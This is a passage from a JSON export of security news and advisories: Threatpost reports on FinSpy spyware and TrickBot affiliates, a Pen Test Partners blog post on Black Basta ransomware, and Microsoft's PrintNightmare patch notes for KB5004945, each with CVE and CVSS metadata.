execute, they stand out due to their evasiveness and persistence. 
While in this case the attackers did not infect the UEFI firmware itself, but its next boot stage, the attack was particularly stealthy, as the malicious module was installed on a separate partition and could control the boot process of the infected machine.\u201d\n\nThe amount of work put into making FinSpy inaccessible to security researchers is particularly worrying, if impressive, said Kuznetsov. \u201cIt seems like the developers put at least as much work into obfuscation and anti-analysis measures as in the trojan itself,\u201d he noted. \u201cThe fact that this spyware is deployed with high precision and is practically impossible to analyze also means that its victims are especially vulnerable, and researchers face a special challenge \u2013 having to invest an overwhelming amount of resources into untangling each and every sample.\u201d\n\n## **Highly Modular FinSpy**\n\nKaspersky also looked into the capabilities of the latest samples to see if there have been advancements and found that FinSpy\u2019s architecture remains highly modular, but more difficult to analyze than ever. That\u2019s because a component called \u201cthe hider\u201d encrypts all of them.\n\n\u201cIt encrypts all of the memory pages, belonging to the whole infrastructure, including the orchestrator and all of the plugins, and all the memory pages will just stay encrypted until they are needed,\u201d explained Kuznetsov. \u201cThe moment the code has to be executed or data has to be accessed, that one page is decrypted. 
Then when it is no longer needed, it\u2019s just encrypted back.\u201d\n\nHe added, \u201cThis means that if you even make a live memory image of an infected machine it will be very hard to find the trojan in memory, because the only unencrypted thing that you will see, will be a tiny part of this hider.\u201d\n\n\n\nSource: Kaspersky.\n\nThe hider is also responsible for starting \u201cthe orchestrator,\u201d which is a core module that will load the rest of the functionality and control the plugins, according to the analysis. It remains more or less the same as it was in previous samples, Kuznetsov said, but it adds a new module called \u201cthe communicator,\u201d which is a hard-coded binary within a resource section of the orchestrator used to maintain C2 communication.\n\nAnother new module is a process worm.\n\n\u201cThis doesn\u2019t infect or propagate between the machines. Instead, it propagates within the machine, starting from the top process where the whole architecture started (usually explorer.exe or Winlogon.exe),\u201d explained Kuznetsov. \u201cIt will make copies of itself in all the child processes, and all these child processes infected will maintain communication with the parent process.\u201d\n\nThis worm module also hooks the keyboard, mouse clicks and various APIs to FinSpy\u2019s various plugins, for data-collection purposes.\n\n\n\nSource: Kaspersky.\n\n\u201cThe plugins themselves are used mostly to collect information about the victim,\u201d he said. \u201cThere are not many plugins devoted to other tasks. We haven\u2019t found any plugins devoted to lateral movement for example, though there is one curious plugin that is devoted to infecting BlackBerry devices.\u201d\n\nThere are individual plugins for stealing credentials for VPNs, dial-up credentials, Microsoft product key information, browser search and browsing history, information about Wi-Fi connections, file listings, and more. 
There\u2019s also a generic plugin for recording audio from any voice over IP (VoIP) software.\n\n\u201cWhat is also interesting is that there are forensic tools for uncovering information about deleted files and storing that deleted-file history,\u201d Kuznetsov said. \u201cThere is also quite a unique plugin that exploits the debug function of modern browsers. By setting a particular environment variable, they make the browsers dump all the SSL encryption keys on disk. And by doing this, the attackers can decrypt all the SSL traffic from the victim.\u201d\n\nAll of the information can be collected in real time and can be live-streamed to the attackers or pre-recorded. Data collection can be triggered by launching an application of interest as well, the researcher noted.\n\nOne thing is clear: FinSpy remains under active development, and its authors have put a herculean effort into avoiding analysis.\n\n\u201cWe spent about eight months full time, with several researchers,\u201d Kuznetsov said. \u201cDuring that time we really had to upgrade all our tooling. We had to invent and make some tools from scratch, all of which led to producing a 300-page report on this. And what is the conclusion here? We think that there is no conclusion, because we believe that this story is never-ending. They will keep updating and upgrading their infrastructure, all the time.\u201d\n", "cvss3": {}, "published": "2021-09-28T17:45:59", "type": "threatpost", "title": "SAS 2021: FinSpy Surveillance Kit Re-Emerges Stronger Than Ever", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2021-22005"], "modified": "2021-09-28T17:45:59", "id": "THREATPOST:88FF52A5E5D2048EB3D0F046F6D96C9F", "href": "https://threatpost.com/finspy-surveillance-kit/175068/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-10-15T18:06:14", "description": "The cybercriminals behind the infamous TrickBot trojan have signed two additional distribution affiliates, dubbed Hive0106 (aka TA551) and Hive0107 by IBM X-Force. The result? Escalating ransomware hits on corporations, especially using the Conti ransomware.\n\nThe development also speaks to the TrickBot gang\u2019s increasing sophistication and standing in the cybercrime underground, IBM researchers said: \u201cThis latest development demonstrates the strength of its connections within the cybercriminal ecosystem and its ability to leverage these relationships to expand the number of organizations infected with its malware.\u201d\n\nThe TrickBot malware started life as a banking trojan back in 2016, but it quickly evolved to become a modular, full-service threat. 
It\u2019s capable of a range of backdoor and data-theft functions, can deliver additional payloads, and has the ability to quickly [move laterally](<https://threatpost.com/trickbot-port-scanning-module/163615/>) throughout an enterprise.\n\nAccording to IBM, the TrickBot gang (aka ITG23 or Wizard Spider) has now added powerful additional distribution tactics to its bag of tricks, thanks to the two new affiliates.\n\n\u201cEarlier this year, [the TrickBot gang] primarily relied on email campaigns delivering Excel documents and a call-center ruse known as BazarCall to deliver its payloads to corporate users,\u201d IBM researchers said in a [Wednesday analysis](<https://securityintelligence.com/posts/trickbot-gang-doubles-down-enterprise-infection/>). \u201cHowever\u2026the new affiliates have added the use of hijacked email threads and fraudulent website customer-inquiry forms. This move not only increased the volume of its delivery attempts but also diversified delivery methods with the goal of infecting more potential victims than ever.\u201d\n\nBazarCall is a [distribution tactic](<https://unit42.paloaltonetworks.com/bazarloader-malware/>) that starts with emails offering \u201ctrial subscriptions\u201d to various services \u2013 with a phone number listed to call customer service to avoid being charged money. If someone calls, a call-center operator answers and directs victims to a website to purportedly unsubscribe from the service: a process the \u201cagent\u201d walks the caller through. In the end, vulnerable computers become infected with malware \u2013 usually the [BazarLoader implant](<https://threatpost.com/bazarloader-malware-slack-basecamp/165455/>), which is another malware in the TrickBot gang\u2019s arsenal, and sometimes TrickBot itself. 
These types of attacks have continued into the autumn, enhanced by the fresh distribution approaches, according to IBM.\n\nMeanwhile, since 2020, the TrickBot gang has been heavily involved in the ransomware economy, with the TrickBot malware acting as an initial access point in campaigns. Users infected with the trojan will see their device become part of a botnet that attackers typically use to load the second-stage ransomware variant. The operators have developed their own ransomware as well, according to IBM: the Conti code, which is notorious for hitting hospitals, [destroying backup files](<https://threatpost.com/conti-ransomware-backups/175114/>) and pursuing [double-extortion tactics](<https://threatpost.com/double-extortion-ransomware-attacks-spike/154818/>).\n\nIBM noted that since the two affiliates came on board in June, there\u2019s been a corresponding increase in Conti ransomware attacks \u2013 not likely a coincidence.\n\n\u201cRansomware and extortion go hand in hand nowadays,\u201d according to the firm\u2019s analysis. \u201c[The TrickBot gang] has also adapted to the ransomware economy through the creation of the Conti ransomware-as-a-service (RaaS) and the use of its BazarLoader and Trickbot payloads to gain a foothold for ransomware attacks.\u201d\n\n## **Affiliate Hive0106: Spam Powerhouse **\n\nIBM X-Force researchers noted that the most important development since June for the distribution of the TrickBot gang\u2019s various kinds of malware is the newly minted partnership with Hive0106 (aka TA551, Shathak and UNC2420).\n\nHive0106 specializes in massive volumes of spamming and is a financially motivated threat group that\u2019s lately been looking to partner with elite cybercrime gangs, the firm said.\n\nHive0106 campaigns begin with hijacking email threads: a tactic pioneered by its frenemy [Emotet](<https://threatpost.com/emotet-takedown-infrastructure-netwalker-offline/163389/>). 
The tactic involves [jumping into ongoing correspondence](<https://unit42.paloaltonetworks.com/emotet-thread-hijacking/>) to respond to an incoming message under the guise of being the rightful account holder. These existing email threads are stolen from email clients during prior infections. Hive0106 is able to mount these campaigns at scale, researchers said, using newly created malicious domains to host malware payloads.\n\n\u201cThe emails include the email thread subject line but not the entire thread,\u201d according to IBM X-Force\u2019s writeup. \u201cWithin the email is an archive file containing a malicious attachment and password.\u201d\n\nIn the new campaigns, that malicious document drops an HTML application (HTA) file when macros are enabled.\n\n\u201cHTA files contain hypertext code and may also contain VBScript or JScript scripts, both of which are often used in boobytrapped macros,\u201d according to the analysis. \u201cThe HTA file then downloads Trickbot or BazarLoader, which has subsequently been observed downloading Cobalt Strike.\u201d\n\nCobalt Strike is the legitimate pen-testing tool that\u2019s [often abused by cybercriminals](<https://threatpost.com/cobalt-strike-cybercrooks/167368/>) to help with lateral movement. It\u2019s often a precursor to a ransomware infection.\n\n## **Hive0107 Comes on Board**\n\nAnother prominent affiliate that hooked its wagon up to the TrickBot gang this summer is Hive0107, which spent the first half of the year distributing the IcedID trojan (a [TrickBot rival](<https://threatpost.com/icedid-banking-trojan-surges-emotet/165314/>)). 
It switched horses to TrickBot in May, using its patented contact form distribution method.\n\nAnalysts \u201cobserved Hive0107 with occasional distribution campaigns of the Trickbot malware detected mid-May through mid-July 2021\u2026after that period, Hive0107 switched entirely to delivering BazarLoader,\u201d according to the researchers, who added that most of the campaigns target organizations in the U.S. and, to a lesser extent, Canada and Europe.\n\nHive0107 is well-known for using customer contact forms on company websites to send malicious links to unwitting employees. Usually, the messages it sends threaten legal action, according to the analysis.\n\nPreviously, the cybercriminals used copyright infringement as a ruse: \u201cThe group typically enters information into these contact forms \u2014 probably using automated methods \u2014 informing the targeted organization that it has illegally used copyrighted images and includes a link to their evidence,\u201d IBM X-Force researchers explained.\n\nIn the new campaigns, Hive0107 is using a different lure, the researchers said, claiming that the targeted company has been performing distributed denial-of-service (DDoS) attacks on its servers. Then, the messages provide a (malicious) link to purported evidence and how to remedy the situation.\n\nThe group also sends the same content via email to organization staff \u2013 an additional switch-up in tactics.\n\nIn any event, the links are hosted on legitimate cloud storage services where the payload lives, according to the analysis.\n\n\u201cClicking on the link downloads a .ZIP archive containing a malicious JScript (JS) downloader titled \u2018Stolen Images Evidence.js\u2019 or \u2018DDoS attack proof and instructions on how to fix it.js,'\u201d researchers explained. 
\u201cThe JS file contacts a URL on newly created domains to download BazarLoader.\u201d\n\nBazarLoader then goes on to download Cobalt Strike and a PowerShell script to exploit the [PrintNightmare vulnerability](<https://threatpost.com/microsoft-unpatched-printnightmare-zero-day/168613/>) (CVE-2021-34527), they added \u2013 and sometimes TrickBot.\n\n\u201cIBM suspects that access achieved through these Hive0107 campaigns is ultimately used to initiate a ransomware attack,\u201d the researchers noted.\n\nThe new affiliate campaigns are evidence of the TrickBot gang\u2019s continuing success breaking into the circle of the cybercriminal elite, the firm concluded \u2013 a trend IBM X-Force expects to continue into next year.\n\n\u201c[The gang] started out aggressively back in 2016 and has become a cybercrime staple in the Eastern European threat-actor arena,\u201d researchers said. \u201cIn 2021, the group has repositioned itself among the top of the cybercriminal industry.\u201d\n\nThey added, \u201cThe group already has demonstrated its ability to maintain and update its malware and infrastructure, despite the efforts of law enforcement and industry groups [to take it down](<https://threatpost.com/authorities-arrest-trickbot-member/169236/>).\u201d\n\n## **How to Protect Companies When TrickBot Hits**\n\nTo reduce the chances of suffering catastrophic damage from an infection (or a follow-on ransomware attack), IBM recommends taking the following steps:\n\n * **Ensure you have backup redundancy**, stored separately from network zones attackers could access with read-only access. 
The availability of effective backups is a significant differentiator for organizations and can support recovery from a ransomware attack.\n * **Implement a strategy to prevent unauthorized data theft**, especially as it applies to uploading large amounts of data to legitimate cloud storage platforms that attackers can abuse.\n * **Employ user-behavior analytics** to identify potential security incidents. When triggered, assume a breach has taken place. Audit, monitor and quickly act on suspected abuse related to privileged accounts and groups.\n * **Employ multi-factor authentication** on all remote access points into an enterprise network.\n * **Secure or disable remote desktop protocol (RDP).** Multiple ransomware attacks have been known to exploit weak RDP access to gain initial entry into a network.\n\n_**Check out our free **_[_**upcoming live and on-demand online town halls **_](<https://threatpost.com/category/webinars/>)_**\u2013 unique, dynamic discussions with cybersecurity experts and the Threatpost community.**_\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-10-15T18:05:29", "type": "threatpost", "title": "TrickBot Gang Enters Cybercrime Elite with Fresh Affiliates", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", 
"accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-34527"], "modified": "2021-10-15T18:05:29", "id": "THREATPOST:827A7E3B49365A0E49A11A05A5A29192", "href": "https://threatpost.com/trickbot-cybercrime-elite-affiliates/175510/", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}], "pentestpartners": [{"lastseen": "2023-08-06T19:44:28", "description": "\n\n### What is Black Basta ransomware?\n\nBlack Basta is a threat group that provides ransomware-as-a-service (RaaS). \n\nThe service is maintained by dedicated developers and is a highly efficient and professionally run operation; there's a TOR website that provides a victim login portal, a chat room, and a wall of the names of companies whose data has been leaked. \n\nThe group first surfaced in 2022, with intel suggesting that the group was buying up stolen credentials on various dark markets. Reports of attacks came soon after. They\u2019re currently in second place, trailing only Lockbit in ransomware attacks globally, targeting a wide array of industries notably in Europe and the US. \n\nVictim chat / login portal:\n\n\n\nNews board (obfuscated) publishing data leaks:\n\n\n\nIn addition to the usual year-on-year double-digit percentage increase in ransomware attacks, BlackBasta has had a huge uptick in attacks since October 2022, landing some high-profile victims such as [Marshall Amplification](<https://thecyberexpress.com/marshall-hacked-black-basta-ransomware-group/>) and [Capita IT](<https://www.theregister.com/2023/04/18/capita_breach_gets_worse/>).\n\nThey are also infamous for their double-extortion methods, stealing data as well as encrypting it. 
This piles on the pressure for victims and provides another avenue for selling on the ill-gotten information.\n\nThey\u2019re believed to be a Russia-based group, and based on attack pattern analysis and observed tactics, they\u2019re also likely an offshoot of, or related to, the Conti ransomware family. \n\nThe well-organised nature and high volume of attacks, combined with a distinct lack of affiliate recruitment on the usual DarkNet sites, has given rise to the speculation that the group is state-sponsored.\n\n### Slick professionals\n\nWhat takes a lot of people by surprise is the slick professionalism of these threat actors. They are labelled ransomware 'gangs' but that downplays how they operate. Black Basta is no different.\n\nSwap the shady dark web site for a service desk and support portal, seized and stolen PII data for business deals in the hundreds of thousands of dollars, and the idea of a lone nerdy hacker in their bedroom for a hierarchical, structured company with various departments, promotion opportunities, and third-party outsourcing.\n\nChat logs for Black Basta now in the public domain show:\n\n * Technical assistance being offered\n * Cryptocurrency tutorials\n * Friendly interactions with clients\n\nThere are even promises of forensic reports, detailing the vulnerabilities that have been used to gain access in the first instance.\n\nThese levels of service should act as a stark reminder of the sophistication involved.\n\n### How are they targeting victims?\n\nThis isn\u2019t a spray-and-pray approach. Companies are selected and targeted. \n\nSpear phishing emails containing malicious payloads are sent to valid accounts - most commonly Microsoft OneNote (.one) attachments, though other Microsoft document file formats have also been seen. 
Opening these files will often show a \u201cCLICK HERE TO VIEW IN OFFICE 365\u201d image (an attempt to confuse potential victims).\n\n\n\nLurking under the image is a file that will reach out to a malicious URL and download further malware.\n\n\n\n### What do they do once they\u2019re inside?\n\nBlack Basta uses PowerShell scripts to gather as much information as possible about the system or network it has landed on, then pivots around and executes further executables using PSExec, RDP and / or WMI. It will also attempt to disable antivirus and use Mimikatz to further harvest credentials.\n\nThe critical Windows flaw enabling these widespread and damaging attacks is the pair of vulnerabilities CVE-2021-1675 and CVE-2021-34527, known as the \u201cPrintNightmare\u201d exploit. This occurs in the print spooler service, leading to privilege escalation and / or remote code execution. Black Basta harnesses this to deploy the Cobalt Strike beacon, which provides a persistence mechanism and the ability to deploy further payloads. \n\nInevitably the end goal is encryption and exfiltration of data (through rclone, interestingly), and a cursory sweep of volume shadow copy deletion to inhibit recovery even further. \n\nDesktops are defaced with the group\u2019s branding, and text documents are scattered in affected directories with instructions on what they want you to do next.\n\nRecently, a Linux variant of the malware was spotted in the wild, targeting ESXi hosts. This is not just for Windows environments! And as you can imagine, hitting a core hypervisor can be absolutely devastating to an organisation.\n\n### Tactics, Techniques, and Procedures (TTPs)\n\n\n\n### What can be done to mitigate?\n\nThe key point of infiltration here is user interaction. The use of OneNote files has caught people unawares. 
Combining that with references to Office 365, broadly named files and legitimate-looking usernames can provide the right mix of confidence and misunderstanding to proceed.\n\nCyber awareness training should include educating colleagues never to open attachments without a complete understanding of what they pertain to, giving extra attention to external senders. \nIn addition, preventing such emails from ever reaching their destination is even more effective. Is it usual for third parties to email unexpected and unrequested files? If not, don\u2019t let them in.\n\nBlackBasta leverages WMI, PowerShell and the Remote Desktop Protocol. Prevent these from being executed on non-critical network endpoints, and the ability to pivot around the network or even perform reconnaissance is severely hindered. \n\nPatch, patch, patch! We have seen that Black Basta leverages the PrintNightmare exploits to gain a foothold on a victim network. It only takes a second to pivot to another methodology, so ensure all operating systems and applications (especially antivirus) are kept completely up to date. \n\nRansomware encryption can be mitigated with isolated and up-to-date backups which can be restored once the network is safe. Data theft is much harder to row back from. Consider implementing intrusion detection systems (IDS) or upgrading to next-generation firewalls (NGFW). These platforms will monitor traffic at a deeper level and in real time to detect and prevent the egress of unauthorised data from emerging threats.\n\n### Help. I\u2019ve already been infected with Black Basta\n\nImmediately disconnect the infected computers or laptops from all network connections.\n\nIn a very serious case where the ransomware has already taken hold on multiple hosts, consider whether turning off your Wi-Fi, disabling any core network connections (including switches), and disconnecting from the internet might be necessary. 
An ideal move here is to block all internet traffic, allowing key services through one by one. But the ability to do this can depend on your business and your systems administration setup.\n\nReset credentials including passwords (especially for administrator and other system accounts) - but verify that you are not locking yourself out of systems that are needed for recovery.\n\nMonitor network traffic and run antivirus scans globally to see what else has been hit. Log preservation is crucial at this point, so be sure to preserve logs in a safe location as quickly as possible.\n\nThe post [Black Basta ransomware](<https://www.pentestpartners.com/security-blog/black-basta-ransomware/>) first appeared on [Pen Test Partners](<https://www.pentestpartners.com>).", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2023-06-28T05:11:34", "type": "pentestpartners", "title": "Black Basta ransomware", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1675", "CVE-2021-34527"], "modified": "2023-06-28T05:11:34", "id": "PENTESTPARTNERS:6636EE51C46282492E9A91509CBA5C4B", "href": 
"https://www.pentestpartners.com/security-blog/black-basta-ransomware/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "mskb": [{"lastseen": "2023-11-28T09:54:39", "description": "None\n**EXPIRATION NOTICE** **IMPORTANT** As of 9/12/2023, this KB is only available from Windows Update. It is no longer available from the Microsoft Update Catalog or other release channels. We recommend that you update your devices to the latest security quality update. \n\n**6/21/21** \n**IMPORTANT** This release includes the Flash Removal Package. Taking this update will remove Adobe Flash from the machine. For more information, see the [Update on Adobe Flash Player End of Support](<https://blogs.windows.com/msedgedev/2020/09/04/update-adobe-flash-end-support/>).\n\n**11/17/20** For information about Windows update terminology, see the article about the [types of Windows updates](<https://docs.microsoft.com/en-us/troubleshoot/windows-client/deployment/standard-terminology-software-updates>) and the [monthly quality update types](<https://techcommunity.microsoft.com/t5/windows-it-pro-blog/windows-quality-updates-primer/ba-p/2569385>). To view other notes and messages, see the Windows 10, version 2004 update history [home page](<https://support.microsoft.com/en-us/help/4555932>). 
\n**Note** Follow [@WindowsUpdate](<https://twitter.com/windowsupdate>) to find out when new content is published to the release information dashboard.\n\n## Highlights\n\n * Updates a remote code execution exploit in the Windows Print Spooler service, known as \u201cPrintNightmare\u201d, as documented in [CVE-2021-34527](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34527>).\n\n## Improvements and fixes\n\n**Note:** To view the list of addressed issues, click or tap the OS name to expand the collapsible section.\n\n### Windows 10 servicing stack update - 19041.1081, 19042.1081, and 19043.1081\n\n * This update makes quality improvements to the servicing stack, which is the component that installs Windows updates. Servicing stack updates (SSU) ensure that you have a robust and reliable servicing stack so that your devices can receive and install Microsoft updates.\n\n### Windows 10, version 21H1\n\nThis security update includes quality improvements. Key changes include:\n\n * This build includes all the improvements from Windows 10, version 2004.\n * No additional issues were documented for this release.\n\n### Windows 10, version 20H2\n\nThis security update includes quality improvements. Key changes include:\n\n * This build includes all the improvements from Windows 10, version 2004.\n * No additional issues were documented for this release.\n\n### Windows 10, version 2004\n\nThis security update includes quality improvements. Key changes include:\n\n * Addresses a remote code execution exploit in the Windows Print Spooler service, known as \u201cPrintNightmare\u201d, as documented in [CVE-2021-34527](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34527>). After installing this and later Windows updates, users who are not administrators can only install signed print drivers to a print server. By default, administrators can install signed and unsigned printer drivers to a print server. 
The installed root certificates in the system\u2019s Trusted Root Certification Authorities trust signed drivers. Microsoft recommends that you immediately install this update on all supported Windows client and server operating systems, starting with devices that currently host the print server role. You also have the option to configure the **RestrictDriverInstallationToAdministrators** registry setting to prevent non-administrators from installing signed printer drivers on a print server. For more information, see KB5005010.\nIf you installed earlier updates, only the new fixes contained in this package will be downloaded and installed on your device.\n\n**Windows Update Improvements** \n \nMicrosoft has released an update directly to the Windows Update client to improve reliability. Any device running Windows 10 configured to receive updates automatically from Windows Update, including Enterprise and Pro editions, will be offered the latest Windows 10 feature update based on device compatibility and Windows Update for Business deferral policy. This doesn't apply to long-term servicing editions.\n\n## Known issues in this update\n\n**Symptoms**| **Workaround** \n---|--- \nWhen using the Microsoft Japanese Input Method Editor (IME) to enter Kanji characters in an app that automatically allows the input of Furigana characters, you might not get the correct Furigana characters. You might need to enter the Furigana characters manually. **Note** The affected apps are using the **ImmGetCompositionString()** function.| This issue is resolved in KB5005101. \nDevices with Windows installations created from custom offline media or custom ISO image might have [Microsoft Edge Legacy](<https://support.microsoft.com/en-us/microsoft-edge/what-is-microsoft-edge-legacy-3e779e55-4c55-08e6-ecc8-2333768c0fb0>) removed by this update, but not automatically replaced by the new Microsoft Edge. 
This issue is only encountered when custom offline media or ISO images are created by slipstreaming this update into the image without having first installed the standalone servicing stack update (SSU) released March 29, 2021 or later. **Note** Devices that connect directly to Windows Update to receive updates are not affected. This includes devices using Windows Update for Business. Any device connecting to Windows Update should always receive the latest versions of the SSU and latest cumulative update (LCU) without any extra steps.| To avoid this issue, be sure to first slipstream the SSU released March 29, 2021 or later into the custom offline media or ISO image before slipstreaming the LCU. To do this with the combined SSU and LCU packages now used for Windows 10, version 20H2 and Windows 10, version 2004, you will need to extract the SSU from the combined package. Use the following steps to extract the SSU:\n\n 1. Extract the cab from the msu via this command line (using the package for KB5000842 as an example): **expand Windows10.0-KB5000842-x64.msu /f:Windows10.0-KB5000842-x64.cab <destination path>**\n 2. Extract the SSU from the previously extracted cab via this command line: **expand Windows10.0-KB5000842-x64.cab /f:* <destination path>**\n 3. You will then have the SSU cab, in this example named **SSU-19041.903-x64.cab**. Slipstream this file into your offline image first, then the LCU.\nIf you have already encountered this issue by installing the OS using affected custom media, you can mitigate it by directly installing the [new Microsoft Edge](<https://www.microsoft.com/edge>). If you need to broadly deploy the new Microsoft Edge for business, see [Download and deploy Microsoft Edge for business](<https://www.microsoft.com/edge/business/download>). \nAfter installing this update, you might have issues printing to certain printers. 
Various brands and models are affected, primarily receipt or label printers that connect via USB. **Note** This issue is not related to [CVE-2021-34527](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34527>) or [CVE-2021-1675](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-1675>).| This issue is resolved in KB5004237. \nAfter installing the May 25, 2021 (KB5003214) and June 21, 2021 (KB5003690) updates, some devices cannot install new updates, such as the July 6, 2021 (KB5004945) or later updates. You will receive the error message, \"PSFX_E_MATCHING_BINARY_MISSING\".| For more information and a workaround, see KB5005322. \nUniversal Windows Platform (UWP) apps might not open on devices that have undergone a Windows device reset. This includes operations that were initiated using Mobile Device Management (MDM), such as Reset this PC, Push-button reset, and Autopilot Reset. UWP apps you downloaded from the Microsoft Store are not affected. Only a limited set of apps are affected, including:\n\n * App packages with framework dependencies\n * Apps that are provisioned for the device, not per user account.\nThe affected apps will fail to open without error messages or other observable symptoms. They must be re-installed to restore functionality.| This issue is addressed in KB5015878 for all releases starting June 21, 2021 and later. \n \n## How to get this update\n\n**Before installing this update** \nMicrosoft now combines the latest servicing stack update (SSU) for your operating system with the latest cumulative update (LCU). 
For general information about SSUs, see [Servicing stack updates](<https://docs.microsoft.com/en-us/windows/deployment/update/servicing-stack-updates>) and Servicing Stack Updates (SSU): Frequently Asked Questions.\n\n**Prerequisite:** For Windows Server Update Services (WSUS) deployment:\n\n * Install the May 11, 2021 update (KB5003173) before you install the latest cumulative update.\nFor offline Deployment Image Servicing and Management (**DISM.exe**) deployment:\n\n * If an image does not have the February 24, 2021 (KB4601382) or later cumulative update, install the January 12, 2021 SSU (KB4598481) and the May 11, 2021 update (KB5003173).\n\n**Install this update**\n\n**Release Channel**| **Available**| **Next Step** \n---|---|--- \nWindows Update or Microsoft Update| Yes| None. This update will be downloaded and installed automatically from Windows Update. \nWindows Update for Business| No| No longer available. \nMicrosoft Update Catalog| No| No longer available. \nWindows Server Update Services (WSUS)| No| No longer available. \n \n**If you want to remove the LCU** \nTo remove the LCU after installing the combined SSU and LCU package, use the [DISM/Remove-Package](<https://docs.microsoft.com/en-us/windows-hardware/manufacture/desktop/dism-operating-system-package-servicing-command-line-options>) command line option with the LCU package name as the argument. You can find the package name by using this command: **DISM /online /get-packages**. Running [Windows Update Standalone Installer](<https://support.microsoft.com/en-us/topic/description-of-the-windows-update-standalone-installer-in-windows-799ba3df-ec7e-b05e-ee13-1cdae8f23b19>) (**wusa.exe**) with the **/uninstall** switch on the combined package will not work because the combined package contains the SSU. 
You cannot remove the SSU from the system after installation.\n\n**File information** \nFor a list of the files that are provided in this update, download the [file information for cumulative update 5004945](<https://download.microsoft.com/download/6/0/4/6046cc97-919a-434d-86de-db2fe63580d0/5004945.csv>). For a list of the files that are provided in the servicing stack update, download the [file information for the SSU - version 19041.1081, 19042.1081, and 19043.1081](<https://download.microsoft.com/download/6/2/d/62d4d81c-0498-4abf-95e7-b9be18ddcabd/SSU_version_19041_1081.csv>). \n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-07-06T00:00:00", "type": "mskb", "title": "July 6, 2021\u2014KB5004945 (OS Builds 19041.1083, 19042.1083, and 19043.1083) Out-of-band", "bulletinFamily": "microsoft", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1675", "CVE-2021-34527"], "modified": "2021-07-06T00:00:00", "id": "KB5004945", "href": "https://support.microsoft.com/en-us/help/5004945", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-05-19T10:52:08", "description": "None\n**6/15/21 
\nIMPORTANT **This release includes the Flash Removal Package. Taking this update will remove Adobe Flash from the machine. For more information, see the [Update on Adobe Flash Player End of Support](<https://blogs.windows.com/msedgedev/2020/09/04/update-adobe-flash-end-support/>).\n\n**5/11/21** \n**REMINDER** Windows 10, version 1909 reached end of service on May 11, 2021 for devices running the Home, Pro, Pro for Workstation, Nano Container, and Server SAC editions. After May 11, 2021, these devices will no longer receive monthly security and quality updates that contain protection from the latest security threats. To continue receiving security and quality updates, Microsoft recommends updating to the latest version of Windows 10. We will continue to service the following editions: Enterprise, Education, and IoT Enterprise.\n\n**11/19/20** \nFor information about Windows update terminology, see the article about the [types of Windows updates](<https://docs.microsoft.com/en-us/troubleshoot/windows-client/deployment/standard-terminology-software-updates>) and the [monthly quality update types](<https://techcommunity.microsoft.com/t5/windows-it-pro-blog/windows-quality-updates-primer/ba-p/2569385>). To view other notes and messages, see the Windows 10, version 1909 update history home page. **Note** Follow [@WindowsUpdate](<https://twitter.com/windowsupdate>) to find out when new content is published to the release information 